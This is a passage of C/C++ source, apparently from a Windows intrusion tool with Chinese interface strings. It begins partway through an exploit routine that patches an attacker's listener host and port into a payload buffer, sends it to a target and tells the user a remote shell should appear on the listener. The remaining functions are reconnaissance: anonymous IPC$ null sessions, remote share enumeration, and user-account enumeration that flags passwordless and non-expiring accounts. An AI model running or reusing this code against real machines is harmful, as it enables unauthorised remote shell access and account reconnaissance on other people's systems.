}
if ((ht = gethostbyname(argv[1])) == 0){
#ifndef WIN32
herror(argv[1]);
#else
pView->AddString( "Unable to resolve host ");
#endif
return 0;
}
sin.sin_port = htons(atoi(argv[2]));
a_port = htons(atoi(argv[4]));
a_port^=0x9595;
sin.sin_family = AF_INET;
sin.sin_addr = *((struct in_addr *)ht->h_addr);
if ((ht = gethostbyname(argv[3])) == 0){
#ifndef WIN32
herror(argv[3]);
#else
pView->AddString("Unable to resolve host ");
#endif
return 0;
}
a_host = *((unsigned long *)ht->h_addr);
a_host^=0x95959595;
sploit[441]= (a_port) & 0xff;
sploit[442]= (a_port >> 8) & 0xff;
sploit[446]=(char) ((a_host) & 0xff);
sploit[447]= (char)((a_host >> 8) & 0xff);
sploit[448]= (char)((a_host >> 16) & 0xff);
sploit[449]=(char) ((a_host >> 24) & 0xff);
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
pView->AddString("socket");
return 0;
}
if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1){
pView->AddString("connect");
return 0;
}
else
pView->AddString("Connected.");
if(send(s,sploit,strlen(sploit),0) == -1) {
pView->AddString("Error Sending Exploit.");
return(-1);
}
else
pView->AddString("sent... you may need to send a carriage on your listener if the shell doesn't appear.have fun!");
::Sleep (1);
closesocket(s);
return 1;
}
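BOOL EstablishNullSession(LPCWSTR Server,BOOL bEstablish)
{
    // Connect to (bEstablish != FALSE) or disconnect from (bEstablish == FALSE)
    // \\Server\IPC$ with an empty user name, password and domain, i.e. an
    // anonymous ("null") session, using NetUseAdd / NetUseDel resolved from
    // NETAPI32.DLL at run time.
    //
    // Server may be passed with or without the leading "\\"; it must not be
    // NULL, empty, or longer than CNLEN characters once the prefix is removed.
    // Returns TRUE when the Net API reports NERR_Success. Otherwise the thread's
    // last error is set to the Net API status (or ERROR_INVALID_COMPUTERNAME for
    // a bad name, ERROR_PROC_NOT_FOUND when an export is missing, or the
    // loader's own error when NETAPI32.DLL cannot be loaded) and FALSE returns.
    // Note: current Windows versions restrict anonymous IPC$ access by default,
    // so NetUseAdd is expected to fail with an access-denied status there.
    LPCWSTR szIpc = L"\\IPC$";
    WCHAR RemoteResource[UNCLEN + 5 + 1]; // "\\" + CNLEN + "\IPC$" + NUL
    DWORD cchServer;
    NET_API_STATUS nas = ERROR_PROC_NOT_FOUND; // reported if the export is missing

    //
    // do not allow NULL or empty server name
    //
    if (Server == NULL || *Server == L'\0') {
        SetLastError(ERROR_INVALID_COMPUTERNAME);
        return FALSE;
    }
    cchServer = lstrlenW(Server);

    // Only a name that starts with BOTH backslashes is already UNC-prefixed;
    // anything else (including "\name") gets the prefix prepended.
    if (cchServer >= 2 && Server[0] == L'\\' && Server[1] == L'\\') {
        cchServer -= 2; // the prefix does not count against CNLEN
        RemoteResource[0] = L'\0';
    }
    else {
        RemoteResource[0] = L'\\';
        RemoteResource[1] = L'\\';
        RemoteResource[2] = L'\0';
    }
    // A bare "\\" or an over-long name would yield an invalid resource path.
    if (cchServer == 0 || cchServer > CNLEN) {
        SetLastError(ERROR_INVALID_COMPUTERNAME);
        return FALSE;
    }
    // Both parts are bounded above, so RemoteResource cannot overflow here.
    if (lstrcatW(RemoteResource, Server) == NULL) return FALSE;
    if (lstrcatW(RemoteResource, szIpc) == NULL) return FALSE;

    HINSTANCE hNetApi = LoadLibrary("NETAPI32.DLL");
    if (hNetApi == NULL) return FALSE; // last error already set by the loader

    //
    // disconnect or connect to the resource, based on bEstablish
    //
    if (bEstablish) {
        USE_INFO_2 ui2;
        ZeroMemory(&ui2, sizeof(ui2));
        ui2.ui2_local = NULL;
        ui2.ui2_remote = (LPTSTR) RemoteResource;
        ui2.ui2_asg_type = USE_IPC;
        ui2.ui2_password = (LPTSTR) L"";   // empty credentials: anonymous session
        ui2.ui2_username = (LPTSTR) L"";
        ui2.ui2_domainname = (LPTSTR) L"";
        NetUseAdd_dll = (LPFNDLLFUNC15)GetProcAddress(hNetApi, "NetUseAdd");
        if (NetUseAdd_dll != NULL)
            nas = NetUseAdd_dll(NULL, 2, (LPBYTE)&ui2, NULL);
    }
    else {
        NetUseDel_dll = (LPFNDLLFUNC16)GetProcAddress(hNetApi, "NetUseDel");
        if (NetUseDel_dll != NULL)
            nas = NetUseDel_dll(NULL, (LPTSTR) RemoteResource, 0);
    }
    // Released on every path, including a failed GetProcAddress.
    FreeLibrary(hNetApi);

    if (nas == NERR_Success) return TRUE; // indicate success
    SetLastError(nas);
    return FALSE;
}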
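int diskenum(LPWSTR computername,LPVOID lParam){
    // Enumerate the shares of computername (NULL = this machine) at
    // SHARE_INFO_502 level, log one line per share to the view and append the
    // same line to pView->m_stringShares. lParam must be the CMyView*.
    // Returns 0 when the enumeration completes and 3 on any failure, so the
    // caller can fall back to diskenum_95() (SHARE_INFO_1 level).
    CMyView* pView = static_cast<CMyView*>(lParam);
    HWND hwnd = pView->GetSafeHwnd();
    pView->AddString("列舉netbios共享(嘗試winnt/2000系統(tǒng))...要等待一段時(shí)間...");
    ::SendMessage(hwnd, WM_REDRAW, 0, 0);

    char line[1024];                 // share paths can be long; formatting is bounded below
    PSHARE_INFO_502 BufPtr = NULL, p;
    NET_API_STATUS res = ERROR_PROC_NOT_FOUND; // reported if NETAPI32 exports are missing
    DWORD i;
    DWORD entriesread = 0, resume_handle = 0, totalentries = 0;
    BOOL headerShown = FALSE;

    pView->AddString("NetBIOS Share Results----------------");
    ::SendMessage(hwnd, WM_REDRAW, 0, 0);
    if (computername == NULL)
        pView->AddString("解析。。。。Shares: Local Path: Uses: Descriptor: ");
    ::SendMessage(hwnd, WM_REDRAW, 0, 0);

    // Load NETAPI32 once for the whole enumeration rather than per call, and
    // resolve both exports up front so the buffer can always be released.
    HINSTANCE hNetApi = LoadLibrary("NETAPI32.DLL");
    if (hNetApi != NULL) {
        NetShareEnum_dll = (LPFNDLLFUNC4)GetProcAddress(hNetApi, "NetShareEnum");
        NetApiBufferFree_dll = (LPFNDLLFUNC5)GetProcAddress(hNetApi, "NetApiBufferFree");
    }
    if (hNetApi == NULL || NetShareEnum_dll == NULL || NetApiBufferFree_dll == NULL) {
        _snprintf(line, sizeof(line) - 1, "Share Enumeration Error (%u)",
                  static_cast<unsigned>(GetLastError()));
        line[sizeof(line) - 1] = '\0';
        pView->AddString(line);
        ::SendMessage(hwnd, WM_REDRAW, 0, 0);
        if (hNetApi != NULL) FreeLibrary(hNetApi);
        return 3;
    }

    do {
        BufPtr = NULL;
        // 0xFFFFFFFF is MAX_PREFERRED_LENGTH: the API sizes the buffer itself;
        // ERROR_MORE_DATA is still honoured by the loop condition.
        res = NetShareEnum_dll(computername, 502, reinterpret_cast<LPBYTE*>(&BufPtr),
                               0xFFFFFFFF, &entriesread, &totalentries, &resume_handle);
        if (res != ERROR_SUCCESS && res != ERROR_MORE_DATA) {
            // NetShareEnum returns its status directly; it does not set GetLastError().
            _snprintf(line, sizeof(line) - 1, "Share Enumeration Error (%u)",
                      static_cast<unsigned>(res));
            line[sizeof(line) - 1] = '\0';
            pView->AddString(line);
            ::SendMessage(hwnd, WM_REDRAW, 0, 0);
            FreeLibrary(hNetApi);
            return 3; // Return 3 on error so we can run diskenum95()
        }
        if (!headerShown) {
            pView->AddString("Shares: Local Path: Uses: Descriptor:");
            ::SendMessage(hwnd, WM_REDRAW, 0, 0);
            headerShown = TRUE;
        }
        for (i = 0, p = BufPtr; i < entriesread; i++, p++) {
            // %S converts the wide Net API strings in this ANSI build; the
            // labels now match their arguments (path under "Local Path",
            // the use count under "Uses").
            _snprintf(line, sizeof(line) - 1,
                      "Shares:%S\\%S Local Path:%S Uses:%u",
                      computername, p->shi502_netname, p->shi502_path,
                      static_cast<unsigned>(p->shi502_current_uses));
            line[sizeof(line) - 1] = '\0';
            pView->AddString(line);
            pView->m_stringShares.AddTail(line);
            ::SendMessage(hwnd, WM_REDRAW, 0, 0);
            // The descriptor pointer may be NULL; only validate a real one.
            if (p->shi502_security_descriptor != NULL &&
                IsValidSecurityDescriptor(p->shi502_security_descriptor))
                pView->AddString("p->shi502_security_descriptor=YES");
            else
                pView->AddString("p->shi502_security_descriptor=NO");
            ::SendMessage(hwnd, WM_REDRAW, 0, 0);
        }
        if (BufPtr != NULL) NetApiBufferFree_dll(BufPtr);
    } while (res == ERROR_MORE_DATA);

    FreeLibrary(hNetApi);
    return 0;
}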
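int diskenum_95(LPWSTR computername,LPVOID lParam){
    // Enumerate the shares of computername (NULL = this machine) at the
    // lower SHARE_INFO_1 level (the level Win95/98 peers answer), log one line
    // per share to the view and append it to pView->m_stringShares.
    // lParam must be the CMyView*. Returns 0 on completion, -1 on any error.
    CMyView* pView = static_cast<CMyView*>(lParam);
    HWND hwnd = pView->GetSafeHwnd();
    pView->AddString("列舉netbios共享(嘗試win95/98)...要等待一段時(shí)間...");
    ::SendMessage(hwnd, WM_REDRAW, 0, 0);

    char line[1024];                 // remarks can be long; formatting is bounded below
    PSHARE_INFO_1 BufPtr = NULL, p;
    NET_API_STATUS res = ERROR_PROC_NOT_FOUND; // reported if NETAPI32 exports are missing
    DWORD i = 0;
    DWORD entriesread = 0, resume_handle = 0, totalentries = 0;

    if (computername == NULL)
        pView->AddString("解析。。。。Shares: Type: Comment:");
    ::SendMessage(hwnd, WM_REDRAW, 0, 0);

    // Load NETAPI32 once and resolve both exports up front so that every
    // returned buffer can be freed and the module handle always released.
    HINSTANCE hNetApi = LoadLibrary("NETAPI32.DLL");
    if (hNetApi != NULL) {
        NetShareEnum_dll = (LPFNDLLFUNC4)GetProcAddress(hNetApi, "NetShareEnum");
        NetApiBufferFree_dll1 = (LPFNDLLFUNC6)GetProcAddress(hNetApi, "NetApiBufferFree");
    }
    if (hNetApi == NULL || NetShareEnum_dll == NULL || NetApiBufferFree_dll1 == NULL) {
        _snprintf(line, sizeof(line) - 1, "Share Enumeration Error (%u)",
                  static_cast<unsigned>(GetLastError()));
        line[sizeof(line) - 1] = '\0';
        pView->AddString(line);
        ::SendMessage(hwnd, WM_REDRAW, 0, 0);
        if (hNetApi != NULL) FreeLibrary(hNetApi);
        return -1;
    }

    do {
        BufPtr = NULL;
        // 0xFFFFFFFF is MAX_PREFERRED_LENGTH: the API sizes the buffer itself.
        res = NetShareEnum_dll(computername, 1, reinterpret_cast<LPBYTE*>(&BufPtr),
                               0xFFFFFFFF, &entriesread, &totalentries, &resume_handle);
        if (res != ERROR_SUCCESS && res != ERROR_MORE_DATA) {
            // NetShareEnum returns its status directly; it does not set GetLastError().
            _snprintf(line, sizeof(line) - 1, "Share Enumeration Error (%u)",
                      static_cast<unsigned>(res));
            line[sizeof(line) - 1] = '\0';
            pView->AddString(line);
            ::SendMessage(hwnd, WM_REDRAW, 0, 0);
            FreeLibrary(hNetApi);
            return -1;
        }
        for (i = 0, p = BufPtr; i < entriesread; i++, p++) {
            // %S converts the wide Net API strings in this ANSI build.
            _snprintf(line, sizeof(line) - 1,
                      "Shares:%S\\%S netname:%S Type:%u Comment:%S",
                      computername, p->shi1_netname, p->shi1_netname,
                      static_cast<unsigned>(p->shi1_type), p->shi1_remark);
            line[sizeof(line) - 1] = '\0';
            pView->AddString(line);
            pView->m_stringShares.AddTail(line);
            ::SendMessage(hwnd, WM_REDRAW, 0, 0);
        }
        if (BufPtr != NULL) NetApiBufferFree_dll1(BufPtr);
    } while (res == ERROR_MORE_DATA);

    FreeLibrary(hNetApi);
    return 0;
}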
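int queryuser(LPWSTR szServer,LPVOID lParam){
    // List the user accounts of szServer (NULL = this machine) through
    // NetQueryDisplayInformation level 1, logging each account plus the UF_*
    // flags that are set, and append every user name to pView->m_stringUsers.
    // lParam must be the CMyView*. Returns 0 when the enumeration completes
    // (all pages consumed) and -1 on any error.
    CMyView* pView = static_cast<CMyView*>(lParam);
    HWND hwnd = pView->GetSafeHwnd();
    pView->AddString("列舉用戶(hù)名...要等待一段時(shí)間...");
    ::SendMessage(hwnd, WM_REDRAW, 0, 0);

    char line[1024];                 // name + comment + full name; bounded below
    char nameBuf[512];
    PNET_DISPLAY_USER pBuff = NULL, p;
    DWORD res = ERROR_PROC_NOT_FOUND; // reported if NETAPI32 exports are missing
    DWORD dwRec = 0;
    DWORD i = 0;                     // index of the next entry to request
    BOOL headerShown = FALSE;

    // Load NETAPI32 once and resolve both exports up front so that every
    // returned buffer can be freed and the module handle always released.
    HINSTANCE hNetApi = LoadLibrary("NETAPI32.DLL");
    if (hNetApi != NULL) {
        NetQueryDisplayInformation_dll =
            (LPFNDLLFUNC3)GetProcAddress(hNetApi, "NetQueryDisplayInformation");
        NetApiBufferFree_dll2 = (LPFNDLLFUNC7)GetProcAddress(hNetApi, "NetApiBufferFree");
    }
    if (hNetApi == NULL || NetQueryDisplayInformation_dll == NULL ||
        NetApiBufferFree_dll2 == NULL) {
        _snprintf(line, sizeof(line) - 1, "User Enumeration Error:(%u) ",
                  static_cast<unsigned>(GetLastError()));
        line[sizeof(line) - 1] = '\0';
        pView->AddString(line);
        ::SendMessage(hwnd, WM_REDRAW, 0, 0);
        if (hNetApi != NULL) FreeLibrary(hNetApi);
        return -1;
    }

    do {
        pBuff = NULL;
        res = NetQueryDisplayInformation_dll(szServer, 1, i, 10000,
                                             10000 * sizeof(NET_DISPLAY_USER),
                                             &dwRec, reinterpret_cast<PVOID*>(&pBuff));
        if (res != ERROR_SUCCESS && res != ERROR_MORE_DATA) {
            _snprintf(line, sizeof(line) - 1, "User Enumeration Error:(%u) ",
                      static_cast<unsigned>(res));
            line[sizeof(line) - 1] = '\0';
            pView->AddString(line);
            ::SendMessage(hwnd, WM_REDRAW, 0, 0);
            FreeLibrary(hNetApi);
            return -1;
        }
        if (!headerShown) {
            pView->AddString("User Query Results------------------------------");
            ::SendMessage(hwnd, WM_REDRAW, 0, 0);
            headerShown = TRUE;
        }
        for (p = pBuff; dwRec > 0; dwRec--, p++) {
            // %S converts the wide Net API strings in this ANSI build.
            _snprintf(line, sizeof(line) - 1,
                      "Name:%S Comment:%S Full Name:%S User ID:%u",
                      p->usri1_name, p->usri1_comment, p->usri1_full_name,
                      static_cast<unsigned>(p->usri1_user_id));
            line[sizeof(line) - 1] = '\0';
            _snprintf(nameBuf, sizeof(nameBuf) - 1, "%S", p->usri1_name);
            nameBuf[sizeof(nameBuf) - 1] = '\0';
            pView->m_stringUsers.AddTail(nameBuf);
            pView->AddString(line);
            ::SendMessage(hwnd, WM_REDRAW, 0, 0);
            if (p->usri1_flags & UF_SCRIPT)
                pView->AddString("The logon script executed. This value must be set for LAN Manager 2.0 or Windows NT.");
            if (p->usri1_flags & UF_ACCOUNTDISABLE)
                pView->AddString("The user's account is disabled.");
            if (p->usri1_flags & UF_HOMEDIR_REQUIRED)
                pView->AddString("The home directory is required. Windows NT ignores this value.");
            if (p->usri1_flags & UF_PASSWD_NOTREQD)
                pView->AddString(" No password is required");
            if (p->usri1_flags & UF_PASSWD_CANT_CHANGE )
                pView->AddString("The user cannot change the password.");
            if (p->usri1_flags & UF_LOCKOUT)
                pView->AddString("The Account is Locked");
            if (p->usri1_flags & UF_DONT_EXPIRE_PASSWD)
                pView->AddString("Password does not expire");
            ::SendMessage(hwnd, WM_REDRAW, 0, 0);
            // Resume index for the next page when the API reports ERROR_MORE_DATA.
            i = p->usri1_next_index;
        }
        if (pBuff != NULL) NetApiBufferFree_dll2(pBuff);
    } while (res == ERROR_MORE_DATA);

    FreeLibrary(hNetApi);
    return 0;
}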